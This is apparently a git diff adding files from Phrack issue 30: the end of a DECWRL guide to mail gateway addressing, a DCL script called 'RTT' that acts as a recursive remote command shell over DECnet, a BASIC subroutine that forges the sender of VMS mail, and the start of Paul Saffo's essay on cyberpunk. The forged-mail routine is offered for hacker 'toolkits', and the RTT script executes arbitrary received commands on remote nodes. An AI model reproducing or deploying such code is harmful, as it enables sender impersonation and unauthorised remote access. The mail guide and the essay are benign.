+interpret strange!foreign!address itself.  If you are typing such an address
+inside a mail program, it will work as advertised.  If you are using DCL and
+typing directly to the command line, you should beware that DCL likes to remove
+quotes, so you will have to enclose the entire address in quotes, and then put
+two quotes in every place that one quote should appear in the address:
+
+    $ mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hello"
+
+Note the three quotes in a row after foreign!addr.  The first two of them are
+doubled to produce a single quote in the address, and the third ends the
+address itself (balancing the quote in front of the nm%).
+
+Here are some typical outgoing mail addresses as used from a VMS system:
+
+    To: nm%DECWRL::"lll-winkin!netsys!phrack"
+    To: nm%DECWRL::"postmaster@msp.pnet.sc.edu"
+    To: nm%DECWRL::"netsys!phrack@uunet.uu.net"
+    To: nm%DECWRL::"phrackserv@CUNYVM.bitnet"
+    To: nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org"
+
+
+* Sending from Ultrix
+
+If your Ultrix system has been configured for it, then you can, from your
+Ultrix system, just send directly to the foreign address, and the mail software
+will take care of all of the gateway routing for you.  Most Ultrix systems in
+Corporate Research and in the Palo Alto cluster are configured this way.
+
+To find out whether your Ultrix system has been so configured, just try it and
+see what happens.  If it doesn't work, you will receive notification almost
+instantly.
+
+    NOTE:  The Ultrix mail system is extremely flexible; it is almost
+    completely configurable by the customer.  While this is valuable to
+    customers, it makes it very difficult to write global instructions for
+    the use of Ultrix mailers, because it is possible that the local changes
+    have produced something quite unlike the vendor-delivered mailer.  One of
+    the popular changes is to tinker with the meaning of quote characters (")
+    in Ultrix addresses.  Some systems consider that these two addresses are
+    the same:
+
+        site1!site2!user@host.dec.com
+
+    and
+
+        "site1!site2!user"@host.dec.com
+
+    while others are configured so that one form will work and the other
+    will not.  All of these examples use the quotes.  If you have trouble
+    getting the examples to work, please try them again without the quotes.
+    Perhaps your Ultrix system is interpreting the quotes differently.
+
+If your Ultrix system has an IP link to Palo Alto (type "/etc/ping
+decwrl.dec.com" to find out if it does), then you can route your mail to the
+gateway via IP.  This has the advantage that your Ultrix mail headers will
+reach the gateway directly, instead of being translated into DECNET mail
+headers and then back into Ultrix at the other end.  Do this as follows:
+
+    To: "alien!address"@decwrl.dec.com
+
+The quotes are necessary only if the alien address contains a ! character, but
+they don't hurt if you use them unnecessarily.  If the alien address contains
+an "@" character, you will need to change it into a "%" character.  For
+example, to send via IP to joe@widget.org, you should address the mail
+
+    To: "joe%widget.org"@decwrl.dec.com
+
+If your Ultrix system has only a DECNET link to Palo Alto, then you should
+address mail in much the same way that VMS users do, save that you should not
+put the nm% in front of the address:
+
+    To: DECWRL::"strange!foreign!address"
+
+Here are some typical outgoing mail addresses as used from an Ultrix system
+that has IP access.  Ultrix systems without IP access should use the same
+syntax as VMS users, except that the nm% at the front of the address should not
+be used.
+
+    To: "lll-winken!netsys!phrack"@decwrl.dec.com
+    To: "postmaster%msp.pnet.sc.edu"@decwrl.dec.com
+    To: "phrackserv%CUNYVM.bitnet"@decwrl.dec.com
+    To: "netsys!phrack%uunet.uu.net"@decwrl.dec.com
+    To: "Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com
+
+
+DETAILS OF USING OTHER NETWORKS
+
+All of the world's computer networks are connected together, more or less, so
+it is hard to draw exact boundaries between them.  Precisely where the Internet
+ends and UUCP begins is a matter of interpretation.
+
+For purposes of sending mail, though, it is convenient to divide the network
+universe into these categories:
+
+Easynet         Digital's internal DECNET network.  Characterized by addresses
+                of the form NODE::USER.  Easynet can be used for commercial
+                purposes.
+
+Internet        A collection of networks including the old ARPAnet, the NSFnet,
+                the CSnet, and others.  Most international research,
+                development, and educational organizations are connected in
+                some fashion to the Internet.  Characterized by addresses of
+                the form user@site.subdomain.domain.  The Internet itself
+                cannot be used for commercial purposes.
+
+UUCP            A very primitive network with no management, built with
+                auto-dialers phoning one computer from another.  Characterized
+                by addresses of the form place1!place2!user.  The UUCP network
+                can be used for commercial purposes provided that none of the
+                sites through which the message is routed objects to that.
+
+USENET          Not a network at all, but a layer of software built on top of
+                UUCP and Internet.
+
+BITNET          An IBM-based network linking primarily educational sites.
+                Digital users can send to BITNET as if it were part of
+                Internet, but BITNET users need special instructions for
+                reversing the process.  BITNET cannot be used for commercial
+                purposes.
+
+Fidonet         A network of personal computers.  I am unsure of the status of
+                using Fidonet for commercial purposes, nor am I sure of its
+                efficacy.
+
+
+DOMAINS AND DOMAIN ADDRESSING
+
+There is a particular network called "the Internet;" it is somewhat related to
+what used to be "the ARPAnet."  The Internet style of addressing is flexible
+enough that people use it for addressing other networks as well, with the
+result that it is quite difficult to look at an address and tell just what
+network it is likely to traverse.  But the phrase "Internet address" does not
+mean "mail address of some computer on the Internet" but rather "mail address
+in the style used by the Internet."  Terminology is even further confused
+because the word "address" means one thing to people who build networks and
+something entirely different to people who use them.  In this file an "address"
+is something like "mike@decwrl.dec.com" and not "192.1.24.177" (which is what
+network engineers would call an "internet address").
+
+The Internet naming scheme uses hierarchical domains, which despite their title
+are just a bookkeeping trick.  It doesn't really matter whether you say
+NODE::USER or USER@NODE, but what happens when you connect two companies'
+networks together and they both have a node ANCHOR??  You must, somehow,
+specify which ANCHOR you mean.  You could say ANCHOR.DEC::USER or
+DEC.ANCHOR::USER or USER@ANCHOR.DEC or USER@DEC.ANCHOR.  The Internet
+convention is to say USER@ANCHOR.DEC, with the owner (DEC) after the name
+(ANCHOR).
+
+But there could be several different organizations named DEC.  You could have
+Digital Equipment Corporation or Down East College or Disabled Education
+Committee.  The technique that the Internet scheme uses to resolve conflicts
+like this is to have hierarchical domains.  A normal domain isn't DEC or
+STANFORD, but DEC.COM (commercial) and STANFORD.EDU (educational).  These
+domains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU.  This
+doesn't resolve conflicts completely, though:  both Central Michigan University
+and Carnegie-Mellon University could claim to be CMU.EDU.  The rule is that the
+owner of the EDU domain gets to decide, just as the owner of the CMU.EDU gets
+to decide whether the Electrical Engineering department or the Elementary
+Education department gets subdomain EE.CMU.EDU.
+
+The domain scheme, while not perfect, is completely extensible.  If you have
+two addresses that can potentially conflict, you can suffix some domain to the
+end of them, thereby making, say, decwrl.UUCP be somehow different from
+DECWRL.ENET.
+
+DECWRL's entire mail system is organized according to Internet domains, and in
+fact we handle all mail internally as if it were Internet mail.  Incoming mail
+is converted into Internet mail, and then routed to the appropriate domain; if
+that domain requires some conversion, then the mail is converted to the
+requirements of the outbound domain as it passes through the gateway.  For
+example, they put Easynet mail into the domain ENET.DEC.COM, and they put
+BITNET mail into the domain BITNET.
+
+The "top-level" domains supported by the DECWRL gateway are these:
+
+  .EDU        Educational institutions
+  .COM        Commercial institutions
+  .GOV        Government institutions
+  .MIL        Military institutions
+  .ORG        Various organizations
+  .NET        Network operations
+  .BITNET     The BITNET
+  .MAILNET    The MAILNET
+  .??         2-character country code for routing to other countries
+  .OZ         Part of the Australian (.AU) name space.
+
+2-character country codes include UK (United Kingdom), FR (France), IT (Italy),
+CA (Canada), AU (Australia), etc.  These are the standard ISO 2-character
+country codes.
+
+
+MAILING TO EASYNET
+
+To mail to user SPRINTER at node WASH (which is DECNET address WASH::SPRINTER),
+Internet mail should be addressed to sprinter@wash.enet.dec.com.  Easynet
+addresses are not case-dependent; WASH and wash are the same node name and
+SPRINTER and sprinter are the same user name.
+
+Sites that are not directly connected to the Internet may have difficulty with
+Internet addresses like wash.enet.dec.com.  They can send into the Easynet by
+explicitly routing the mail through DECWRL.  From domain-based Internet
+mailers, the address would be sprinter%wash.enet@decwrl.dec.com.  From UUCP
+mailers, the address would be decwrl!wash.enet!sprinter. Some Internet mailers
+require the form <@decwrl.dec.com:sprinter@wash.enet>.  (This last form is the
+only technically correct form of explicit route, but very few Internet sites
+support it.)
+
+The DECWRL gateway also supports various obsolete forms of addressing that are
+left over from the past.  In general they support obsolete address forms for
+two years after the change, and then remove it.
+
+
+MAILING TO DIGITAL ALL-IN-1 USERS
+
+Some Easynet users do not have a direct DECNET node address, but instead read
+their mail with All-in-1, which uses addresses of the form "Nate State @UCA".
+Here "UCA" is a Digital location code name.  To route mail to such people, send
+to Nate.State@UCA.MTS.DEC.COM.  Mail received from the All-in-1 mailer is
+unreplyable, and in fact unless the respondent tells you his return address in
+the body of the message, it is not normally possible even to puzzle out the
+return address by studying the message header.  Mail from All-in-1 to Easynet
+passes through a gateway program that does not produce valid return addresses.
+
+
+MAILING TO THE INTERNET
+
+DECWRL's mailer is an Internet mailer, so to mail to an Internet site, just use
+its address.  If you are having trouble determining the Internet address, you
+might find that the Ultrix host table /etc/hosts.txt is useful.  If you can't
+find one anywhere else, there's one on DECWRL.  See the comments above under
+"how to send mail" for details about making sure that the mail program you are
+using has correctly interpreted an address.
+
+
+MAILING TO UUCP
+
+UUCP mail is manually routed by the sender, using ! as the separator character.
+Thus, the address xxx!yyy!zzz!user means to dial machine xxx and relay to it
+the mail, with the destination address set to yyy!zzz!user.  That machine in
+turn dials yyy, and the process repeats itself.
+
+To correctly address UUCP mail, you must know a working path through the UUCP
+network.  The database is sufficiently chaotic that automatic routing does not
+work reliably (though many sites perform automatic routing anyhow).  The
+information about UUCP connectivity is distributed in the USENET newsgroup
+comp.mail.maps; many sites collect this data and permit local queries of it.
+
+At the end of this file is a list of the UUCP nodes to which DECWRL currently
+has a working connection.
+
+
+MAILING TO USENET
+
+Usenet is not a network.  It's a software layer, and it spans several networks.
+Many people say "Usenet" when they really mean UUCP.  You can post a message to
+a Usenet newsgroup by mailing it to "name@usenet" at DECWRL.  For example,
+mailing from VMS to this address:
+
+    nm%DECWRL::"alt.cyberpunk@usenet"
+
+causes the mail message to be posted as an article to the Usenet newsgroup
+alt.cyberpunk.  It is better to use Usenet software for posting articles, as
+more features are available that way, such as restricted distributions,
+crossposting, and cancellation of "wish I hadn't sent that" articles.
+
+
+MAILING TO BITNET
+
+Legend has it that the "BIT" in BITNET stands for "Because It's There" or
+"Because It's Time."  It is a network consisting primarily of IBM computers.  A
+native BITNET address is something like "OMAR at STANFORD", but when translated
+into our Internet format it becomes omar@stanford.bitnet.  Once translated into
+Internet form, a BITNET address is used just like any other Internet address.
+
+
+MAILING TO FIDONET
+
+By comparison with the other linked networks, Fidonet has an addressing
+complexity bordering on the bizarre.  The Fidonet people have provided me with
+this description:
+
+Each Fidonet node is a member of a "network," and may have subsidiary nodes
+called "point nodes."  A typical Fido address is "1:987/654" or "987/654"; a
+typical Fido "point node" address is "1:987/654.32" or "987/654.32".  This is
+zone 1, network 987, Fido (node) 654, "point node" 32.  If the zone number is
+missing, assume it is zone 1.  The zone number must be supplied in the outgoing
+message.
+
+To send a message to Chris Jones on Fidonet address 1:987/654, use the address
+Chris.Jones@f654.n987.z1.fidonet.org.  To send a message to Mark Smith at
+Fidonet node 987/654.32, use address Mark.Smith@p32.f654.n987.z1.fidonet.org.
+Use them just like any other Internet address.
+
+Sometimes the return addresses on messages from Fidonet will look different.
+You may or may not be able to reply to them.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Appendix:  List of UUCP Neighbor Sites
+
+This table shows most of the sites that DECWRL dials directly via UUCP.  You
+may find it useful to help you construct a UUCP route to a particular
+destination.  Those sites marked with "*" are major UUCP routing nodes.  You
+should prefer UUCP routes that use these sites as the first hop from DECWRL.
+Case is significant in UUCP host names.
+
+      3comvax    3Com Corporation, Santa Clara, CA
+      abvax      Allen-Bradley Company, Highland Heights, OH
+      acad       Autodesk, Inc, Sausalito, CA
+      adobe      Adobe Systems Inc., Mountain View, CA
+      alberta    University of Alberta, Edmonton, Alberta, Canada
+      allegra    AT&T Bell Laboratories, Murray Hill, NJ
+     *amdahl     Amdahl Corp., Sunnyvale, CA
+      amdcad     Advanced Micro Devices, Sunnyvale, CA
+      ames       NASA Ames Research Center, Mountain View, CA
+     *apple      Apple Computers, Cupertino, CA
+      ardent     Ardent Computer Corp., Sunnyvale, CA
+      argosy     MassPar Computer Corp., Sunnyvale, CA
+      atha       Athabasca University, Athabasca, Alberta, Canada
+      athertn    Atherton Technology, Sunnyvale, CA
+     *att        AT&T Bell Laboratories, Columbus, Ohio
+      avsd       Ampex Corporation, Redwood City, CA
+      cae780     Tektronix Inc. (Santa Clara Field Office) Santa Clara, CA
+      chip       M/A-COM Government Systems, San Diego, CA
+      claris     Claris Corporation, Mountain View, CA
+      daisy      Daisy Systems, Mountain View, CA
+      decuac     DEC/Ultrix Applications Ctr, Landover, MD
+     *decvax     DEC/Ultrix Engineering, Nashua, NH
+      dsinc      Datacomp Systems, Inc, Huntington Valley, PA
+      eda        EDA Systems Inc., Santa Clara, CA
+      emerald    Emerald Systems Corp., San Diego, CA
+      escd       Evans and Sutherland Computer Division, Mountain View, CA
+      esunix     Evans and Sutherland Corp., Salt Lake City, UT
+      fluke      John Fluke Manufacturing, Everett, WA
+      gryphon    Trailing Edge Technology, Redondo Beach, CA
+      handel     Colorodo State Univ., CS Dept., Ft. Collins, CO
+      hoptoad    Nebula Consultants, San Francisco, CA
+     *hplabs     Hewlett Packard Research Labs, Palo Alto, CA
+      ide        Interactive Development Environments, San Francisco, CA
+      idi        Intelligent Decisions, Inc., San Jose, CA
+      imagen     Imagen Corp., Santa Clara, CA
+      intelca    Intel Corp., Santa Clara, CA
+      limbo      Intuitive Systems, Los Altos, CA
+      logitech   Logitech, Inc., Palo Alto, CA
+      megatest   Megatest Corp., San Jose, CA
+      metaphor   Metaphor Corp., Mountain View, CA
+      microsoft  Microsoft, Bellevue, WA
+      mindcrf    Mindcraft Corp., Palo Alto, CA
+      mips       MIPS Computer Systems, Mountain View, CA
+      mntgfx     Mentor Graphics Corp., Beaverton, OR
+      mordor     Lawrence Livermore National Lab, Livermore, CA
+      mtu        Michigan Tech Univ., Houghton, MI
+      mtxinu     Mt. Xinu, Berkeley, CA
+      nsc        National Semiconductor Corp., Sunnyvale, CA
+      oli-stl    Olivetti Software Techn. Lab, Menlo Park, CA
+      oracle     Oracle Corp., Belmont, CA
+     *pacbell    Pacific Bell, San Ramon, CA
+      parcplace  Parc Place Systems, Palo Alto, CA
+      purdue     Purdue University, West Lafayette, IN
+     *pyramid    Pyramid Technology Corporation, Mountain View, CA
+      qubix      Qubix Graphic Systems, San Jose, CA
+      quintus    Quintus Computer Systems, Mountain View, CA
+      research   AT&T Bell Laboratories, Murray Hill, NJ
+      riacs      Res.Inst. for Adv. Compu. Sci., Mountain View, CA
+      rtech      Relational Technology Inc., Alameda, CA
+      sci        Silicon Compilers, San Jose, CA
+      sco        Santa Cruz Operation, Santa Cruz, CA
+      sequent    Sequent Computer System, Inc., Beaverton, OR
+      sgi        Silicon Graphics, Inc., Mountain View, CA
+      shell      Shell Development Corp., Houston, TX
+      simpact    Simpact Assoc., San Diego, CA
+      sjsca4     Schlumberger Technologies, San Jose, CA
+      sun        Sun Microsystems, Mountain View, CA
+      td2cad     Intel Corp., Santa Clara, CA
+      teraida    Teradyne EDA Inc., Santa Clara, CA
+      theta      Process Software Inc., Wellesley, MA
+      turtlevax  CIMLINC, Inc, Palo Alto, CA
+     *ucbvax     University of California, Berkeley, CA
+      utcsri     Univ. of Toronto, Computer Science, Toronto, CA
+      vlsisj     VLSI Technology Inc., San Jose, CA
+      wyse       Wyse Technology, San Jose, CA
+      zehntel    Zehntel, Inc., Walnut Creek, CA
+_______________________________________________________________________________
diff --git a/phrack30/6.txt b/phrack30/6.txt
new file mode 100644
index 0000000..70eb60b
--- /dev/null
+++ b/phrack30/6.txt
@@ -0,0 +1,130 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 30, File #6 of 12
+
+                   Decnet Hackola : Remote Turist TTY (RTT)
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+                           A Late-Night Creation Of
+
+                                   *Hobbit*
+
+This VMS network frob is yet another "tell"-type thing.  This one has an
+uncommon feature though:  recursion (i.e. you can be connected to some host
+and open *another* connection to a third host and it will [attempt to!] "do the
+right thing").  Also, you can ^Y out and if you run it again, it will return to
+the open connection instead of starting a new one.
+
+_H*
+
+
+*************************************************************************
+$! RTT -- Remote Turist TTY interface.  Do @RTT hostname or @RTT area.node
+$! to start; this file must exist in the remote machine's default area.
+$! You can ^Y out and the network channel will stick around; invoking RTT
+$! again will resume the extant process and ignore arguments.
+$! If we are a network object, play server, if not, we must be the client.
+$! If we are called while already playing server, recurse to the end host.
+$! This recursion in theory can happen infinite times.  Make damn sure
+$! what you call this file and the "task=" spec jive, and that they are the
+$! same file, or you will fall victim to very vicious timing screws.
+$!
+$! Another result of *Hobbit* abusing network file jobs until well past dawn.
+$!
+$! _H*
+$set noon
+$if f$mode().eqs."NETWORK".and.p1.eqs."" then $goto srv
+$! Talking to a luser, go find the net job
+$magic=0                        ! assume top level
+$if f$trnlnm("nf",,,,,"table_name").nes."" then $goto lread
+$sl=f$len(p1)
+$dot=f$locate(".",p1)           ! area.node
+$if sl.eq.dot then $goto nopen  ! no dot, treat normally
+$q=f$loc("""",p1)               ! access control??
+$node=f$ext(0,dot,p1)           ! area
+$dot=dot+1                      ! point past it now
+$node=node*1024+f$ext(dot,q-dot,p1)  ! and pull out the complete node
+$rest=""""+f$ext(q,80,p1)+""""  ! superquotify the quotes [yeccchh!]
+$p1="''node'''rest'"            ! add remains in stringwise [ack barf]
+$! We were called with an argument; but if we're network mode, we're *already*
+$! a server, so do special things.
+$nopen: $if f$mode().eqs."NETWORK" then $magic=1
+$! Top-level user process or recursed here: client connect
+$open/read/write/err=yuk nf 'p1'::"0=rtt"
+$read/time=5/err=yuk nf hprm    ! let other end tell us where we got
+$prm==hprm                      ! global prompt str so we resume correctly
+$write sys$output "Connection open"
+$if magic then $goto m_setup
+$lread: $read/prompt="''prm'$ "/end=lclose sys$command line
+$write nf line                  ! send the sucker and go get the stuff
+$ltype: $read/time=8/err=tmo/end=lclose nf line
+$if line.eqs."%%eoc%%" then $goto lread
+$if line.eqs."%%magic%%" then $goto newprm
+$write sys$output line
+$goto ltype
+$newprm: $read nf hprm          ! new prompt gets piped in from servers
+$prm==hprm                      ! let us find it
+$read nf line                   ! garbola %%eoc%% -- avoid timing fuckup
+$if line.nes."%%eoc%%" then $goto hpe  !! oops !!
+$goto lread
+$tmo: $write sys$output "[Timed out]"   ! supposed to bail out on a fuckup
+$goto lread                             ! it doesn't always work, though.
+$!
+$! Do a special dance when we're recursing
+$m_setup: $write nnn "%%magic%%"
+$write nnn prm                  ! notify client end of new connection
+$signal                         ! flush the inbetweens
+$goto rread                     ! and drop to magic server
+$!
+$srv:                           ! Normal remote task half
+$! This is an unbelievable kludge.  You can't just open sys$net: and then
+$! have program output go there as well as the control thingies, but you
+$! *can* pipe everything to your sys$net-opened-device: and it *works*!
+$open/read/write/err=yuk nnn sys$net:
+$close sys$output               ! netserver.log?
+$close sys$error
+$magic=0                        ! not recursing yet
+$! Some handy symbols for the far end
+$rtt:==@sys$login:rtt           ! make further connects easier
+$ncp:==$ncp                     ! for hacking the network
+$signal:==write nnn """%%eoc%%""" ! magic sync string
+$write nnn f$trnl("sys$node","lnm$system_table")        ! HELO...
+$def/pr sys$output nnn:         ! the awful kludge is invoked
+$def/pr sys$error nnn:          ! for error handling too
+$!
+$! Server loop
+$rread: $read/end=rclose nnn line
+$if magic then $goto passing
+$'line'
+$m_cmd_end: $signal             ! signal for all completions
+$goto rread
+$! If we're magically in the middle, handle differently
+$passing: $write nf line
+$mtype: $read/time=5/err=mclose/end=mclose nf line
+$if line.eqs."%%eoc%%" then $goto m_cmd_end
+$write nnn line
+$goto mtype
+$!
+$! Closure and error handlers
+$! General protocol error catch
+$yuk: $write sys$output "Couldn't open network!"
+$exit
+$! Here if the luser typed ^Z
+$lclose: $close nf              ! should signal eof at far end
+$exit
+$! Here if we got hung up on by the client
+$rclose: $if magic then $close nf
+$close nnn
+$stop/id=0
+$! Here if we're magic and our remote server exited: tell client whats flying
+$mclose: $close nf
+$magic=0
+$write nnn "%%magic%%"
+$write nnn f$trnl("sys$node","lnm$system_table")
+$signal
+$goto rread
+$! Here if we recursed down the line there and didn't see the right things
+$hpe: $write sys$output "!!Hairy protocol error!!"
+$close nf
+$exit
+_______________________________________________________________________________
diff --git a/phrack30/7.txt b/phrack30/7.txt
new file mode 100644
index 0000000..b2035e3
--- /dev/null
+++ b/phrack30/7.txt
@@ -0,0 +1,239 @@
+                                ==Phrack Inc.=
+
+                     Volume Three, Issue 30, File #7 of 12
+
+                             =-------------------=
+
+                               VAX/VMS Fake Mail
+
+                                by Jack T. Tab
+
+                             =-------------------=
+
+
+In the August 1986 issue of VAX PROFESSIONAL, the BASIC subroutine that appears
+at the end of this text was published.  It was not until more than two years
+later that DEC included a callable mail interface with VMS 5.x.  While the
+official version is much more extensive, the routine included here has one
+important feature.  The ability to have a mail message appear to be from
+someone else is a good addition to most "toolkits."
+
+VMS Mail works in two manners.  The first is the familiar interactive.  The
+second is as a network object.  In this method, MAIL is invoked by the
+NETSERVER.COM command procedure in response to an incoming connect request.
+MAIL.EXE is activated as network object 27.  The other network objects can be
+viewed by using the NCP command SHOW KNOWN OBJECTS.  In this mode, MAIL.EXE
+operates as a slave process, receiving instructions from the master process.
+The master, in most cases, is another process running MAIL.EXE interactively.
+The slave process can handle requests to deliver mail to as many recipients as
+necessary.  Addresses that are not on the same node as the slave process are
+forwarded by activating yet another slave process on the target node.  The
+information sent by the master MAIL to the slave MAIL is quite simple and
+straightforward, consisting of a series of strings.
+
+The first string is for the FROM name.  This is what makes the subroutine
+useful, as it can be anything (i.e. the_Easter_Bunny).  The next set of strings
+are to whom the mail is to be sent.  One address per string, with a null
+string, chr(0), terminating the list.  The third item is what the receiver(s)
+sees in their TO: field.  This also can be anything.  VMS MAIL can use this
+option for its .DIS distribution lists.  The final information is the body of
+the message.  It too is terminated by another null string.  The subject of the
+mail message is taken from the first line of this text.
+
+The MAIL slave will send back appropriate status messages indicating problems
+if they occur.  Such as "Addressee Unknown" or VMS and DECnet errors like "Disk
+Quota Exceeded" or "Remote Node Not Reachable").
+
+The only privilege that seems necessary is NETMBX.  Without it the subroutine
+cannot call MAIL as a network object.  Our beloved system management resolved
+the problem of people pretending to be SYSTEM by installing MAIL with NETMBX
+and removing the priv from the student accounts.  The subroutine works just as
+well with JNET and BITNET as it does with DECNET addresses.
+
+
+***********************************CUT HERE************************************
+1  %TITLE 'MAIL SUBROUTINE'
+
+   SUB MAILT( STRING NODE, &
+       STRING FROM_NAME, &
+       STRING TO_LIST(), &
+       STRING TO_SHOW, &
+       STRING SUBJECT, &
+       STRING TEXT() )
+
+   OPTION TYPE = INTEGER
+
+   DECLARE INTEGER FUNCTION &
+     PUT_MSG
+
+   DECLARE STRING FUNCTION &
+     GET_MSG, &
+     GET_INPUT
+
+   DECLARE INTEGER CONSTANT &
+     TRUE = -1, &
+     FALSE = 0
+   Net_Link_Open = FALSE
+
+   Z = POS( NODE + ":" , ":" , 1)
+   NODE_NAME$ = LEFT$( NODE , Z - 1 )
+   ON ERROR GOTO Mail_Net_Error
+   MAIL_CHANNEL = 12
+   OPEN NODE_NAME$ + '::"27="' AS FILE MAIL_CHANNEL
+
+   Net_Link_Open = TRUE
+
+   STS = PUT_MSG( FROM_NAME )
+   IF STS <> 0 THEN
+     GOTO ERROR_DONE
+   END IF
+   RECEIVERS = 0
+   TO_COUNT = 1
+
+Mail_Recipients:
+   IF TO_LIST( TO_COUNT ) = "" THEN
+     GOTO End_Of_Line
+   END IF
+   STS = PUT_MSG( EDIT$( TO_LIST( TO_COUNT ) , 32 ) )
+   IF STS <> 0 THEN
+     GOTO Error_Done
+   END IF
+   GOSUB Errchk
+   IF LINK_ERR <> 0 THEN
+     GOTO Error_Done
+   END IF
+
+   IF ( ERRSTS AND 1 ) = 0 THEN
+     GOTO Error_Done
+   END IF
+
+   TO_COUNT = TO_COUNT + 1
+   GOTO Mail_Recipients
+
+END_OF_LINE:
+   STS = PUT_MSG( CHR$(0) )
+   IF STS <> 0 THEN
+     GOTO Error_Done
+   END IF
+   IF RECEIVERS = 0 THEN
+     GOTO Mail_Done
+   END IF
+
+   STS = PUT_MSG( TO_SHOW )
+   IF STS <> 0 THEN
+     GOTO Error_Done
+   END IF
+
+   STS = PUT_MSG( SUBJECT )
+   IF STS <> 0 THEN
+     GOTO Error_Done
+   END IF
+
+   FOR I = 1 UNTIL TEXT(I) = CHR$(255)
+     STS = PUT_MSG( TEXT(I) )
+     IF STS <> 0 THEN
+       GOTO Error_Done
+     END IF
+   NEXT I
+
+   STS = PUT_MSG( CHR$(0) )
+   IF STS <> 0 THEN
+     GOTO Error_Done
+   END IF
+   SAVE_COUNT = RECEIVERS
+   INDEX = 0
+
+Delivery_Check:
+   GOSUB Errchk
+   IF LINK_ERR <> 0 THEN
+     GOTO Error_Done
+   END IF
+   INDEX = INDEX + 1
+   IF INDEX <> SAVE_COUNT THEN
+     GOTO Delivery_Check
+   END IF
+   GOTO Mail_Done
+
+Errchk:
+   MAIL_STS = ASCII( GET_MSG )
+   IF LINK_ERR <> 0 THEN
+     ERRSTS = LINK_ERR
+     RETURN
+   END IF
+   IF ( MAIL_STS AND 1 ) = 1 THEN
+     Receivers = Receivers + 1
+     ERRSTS = MAIL_STS
+     RETURN
+   END IF
+
+Errmsg:
+   MAIL_ERR$ = GET_MSG
+   IF LINK_ERR <> 0 THEN
+     ERRSTS = LINK_ERR
+     RETURN
+   END IF
+   IF LEN( MAIL_ERR$ ) <> 1 THEN
+     PRINT MAIL_ERR$
+     GOTO Errmsg
+   END IF
+   IF ASCII( MAIL_ERR$ ) = 0 THEN
+     RETURN
+   ELSE
+     GOTO Errmsg
+   END IF
+
+   DEF INTEGER PUT_MSG( STRING M )
+   ON ERROR GOTO 1550
+   MLEN = LEN( M )
+   MOVE TO # MAIL_CHANNEL , M = MLEN
+   PUT # MAIL_CHANNEL, COUNT MLEN
+   PUT_MSG = 0
+   EXIT DEF
+
+1550 RESUME 1555
+
+1555 PUT_MSG = ERR
+     END DEF
+
+   DEF STRING GET_INPUT( INTEGER C )
+   EOF = FALSE
+   ON ERROR GOTO 1650
+   GET # C
+   R = RECOUNT
+   MOVE FROM #C , TEMP$ = R
+   GET_INPUT = TEMP$
+   EXIT DEF
+
+1650 RESUME 1655
+
+1655 EOF = TRUE
+     END DEF
+
+   DEF STRING GET_MSG
+   ON ERROR GOTO 1750
+   GET # MAIL_CHANNEL
+   R = RECOUNT
+   MOVE FROM # MAIL_CHANNEL , TEMP$ = R
+   GET_MSG = TEMP$
+   LINK_ERR = 0
+   EXIT DEF
+
+1750 RESUME
+
+1755 LINK_ERR = ERR
+     END DEF
+
+Mail_Net_Error:
+  RESUME 1900
+
+1900 PRINT "%Network communications error."
+
+Error_Done:
+
+Mail_Done:
+   IF Net_Link_Open THEN
+     CLOSE MAIL_CHANNEL
+   END IF
+
+   END SUB
+***********************************CUT HERE************************************
diff --git a/phrack30/8.txt b/phrack30/8.txt
new file mode 100644
index 0000000..f4c731d
--- /dev/null
+++ b/phrack30/8.txt
@@ -0,0 +1,173 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 30, File #8 of 12
+
+        <<===========================================================>>
+        <<                                                           >>
+        <<            Consensual Realities In Cyberspace             >>
+        <<                                                           >>
+        <<                       by Paul Saffo                       >>
+        <<                Personal Computing Magazine                >>
+        <<                                                           >>
+        << Copyright 1989 by the Association for Computing Machinery >>
+        <<                                                           >>
+        <<===========================================================>>
+
+More often than we realize, reality conspires to imitate art.  In the case of
+the computer virus reality, the art is "cyberpunk," a strangely compelling
+genre of science fiction that has gained a cult following among hackers
+operating on both sides of the law.  Books with titles like "True Names,"
+"Shockwave Rider," "Neuromancer," "Hard-wired," "Wetware," and "Mona Lisa
+Overdrive," are shaping the realities of many would-be viral adepts.  Anyone
+trying to make sense of the social culture surrounding viruses should add the
+books to their reading list as well.
+
+Cyberpunk got its name only a few years ago, but the genre can be traced back
+to publication of John Brunner's "Shockwave Rider" in 1975.  Inspired by Alvin
+Toffler's 1970 best-seller "Future Shock," Brunner paints a distopian world of
+the early 21st Century in which Toffler's most pessimistic visions have come to
+pass.  Crime, pollution and poverty are rampant in overpopulated urban
+arcologies.  An inconclusive nuclear exchange at the turn of the century has
+turned the arms race into a brain race.  The novel's hero, Nickie Haflinger, is
+rescued from a poor and parentless childhood and enrolled in a top secret
+government think tank charged with training geniuses to work for a
+military-industrial Big Brother locked in a struggle for global political
+dominance.
+
+It is also a world certain to fulfill the wildest fantasies of a 1970s phone
+"phreak."  A massive computerized data-net blankets North America, an
+electronic super highway leading to every computer and every last bit of data
+on every citizen and corporation in the country.  Privacy is a thing of the
+past, and one's power and status is determined by his or her level of identity
+code.  Haflinger turns out to be the ultimate phone phreak:  he discovers the
+immorality of his governmental employers and escapes into society, relying on
+virtuoso computer skills (and a stolen transcendental access code) to rewrite
+his identity at will.  After six years on the run and on the verge of a
+breakdown from input overload, he discovers a lost band of academic
+techno-libertarians who shelter him in their ecologically sound California
+commune and... well, you can guess the rest.
+
+Brunner's book became a best-seller and remains in print.  It inspired a whole
+generation of hackers including, apparently, Robert Morris, Jr. of Cornell
+virus fame.  The Los Angeles Times reported that Morris' mother identified
+"Shockwave Rider" as "her teen-age son's primer on computer viruses and one of
+the most tattered books in young Morris' room."  Though "Shockwave Rider" does
+not use the term "virus," Haflinger's key skill was the ability to write
+"tapeworms" -- autonomous programs capable of infiltrating systems and
+surviving eradication attempts by reassembling themselves from viral bits of
+code hidden about in larger programs.  Parallels between Morris' reality and
+Brunner's art is not lost on fans of cyberpunk:  one junior high student I
+spoke with has both a dog-eared copy of the book, and a picture of Morris taped
+next to his computer.  For him, Morris is at once something of a folk hero and
+a role model.
+
+In "Shockwave Rider," computer/human interactions occurred much as they do
